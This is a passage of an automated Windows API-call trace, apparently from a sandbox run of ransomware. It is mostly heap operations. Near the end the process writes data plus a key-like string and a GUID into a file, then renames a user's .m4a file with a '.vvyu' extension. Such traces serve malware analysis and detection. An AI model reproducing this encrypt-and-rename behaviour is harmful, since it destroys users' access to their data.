(HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade788 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69e0 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a10 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a70 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a28 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.099] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0199.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0199.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a70 [0199.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0199.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a28 [0199.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6a10 [0199.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0199.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0199.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0199.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.103] GetCurrentThreadId () returned 0x5d8 [0199.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5960 [0199.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0199.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.104] GetCurrentThreadId () returned 0x5d8 [0199.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a70 [0199.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a10 [0199.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0199.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a28 [0199.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69f8 [0199.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a88 [0199.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0199.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a58 [0199.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a40 [0199.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6aa0 [0199.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a40 [0199.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0199.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0199.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a10 [0199.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0199.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0199.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0199.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade788 | out: hHeap=0x2c0000) returned 1 [0199.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0199.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.115] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x18bbe, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x18bbe, lpOverlapped=0x0) returned 1 [0199.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0199.117] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x18bc3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.117] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.119] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.119] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.119] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.119] CloseHandle (hObject=0x584) returned 1 [0199.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0199.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0199.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0199.122] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\cuoL988XNBLbr.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\f6adjjdhq\\cuol988xnblbr.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\cuoL988XNBLbr.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\f6adjjdhq\\cuol988xnblbr.m4a.vvyu")) returned 1 [0199.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.123] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0199.126] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed078130, ftCreationTime.dwHighDateTime=0x1d89913, ftLastAccessTime.dwLowDateTime=0x9b8c2950, ftLastAccessTime.dwHighDateTime=0x1d8a0f7, ftLastWriteTime.dwLowDateTime=0x9b8c2950, ftLastWriteTime.dwHighDateTime=0x1d8a0f7, nFileSizeHigh=0x0, nFileSizeLow=0x18bc3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cuoL988XNBLbr.m4a", cAlternateFileName="CUOL98~1.M4A")) returned 0 [0199.126] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0199.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ba80 | out: hHeap=0x2c0000) returned 1 [0199.127] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0199.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0199.127] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0199.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0199.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.134] HeapFree (in: 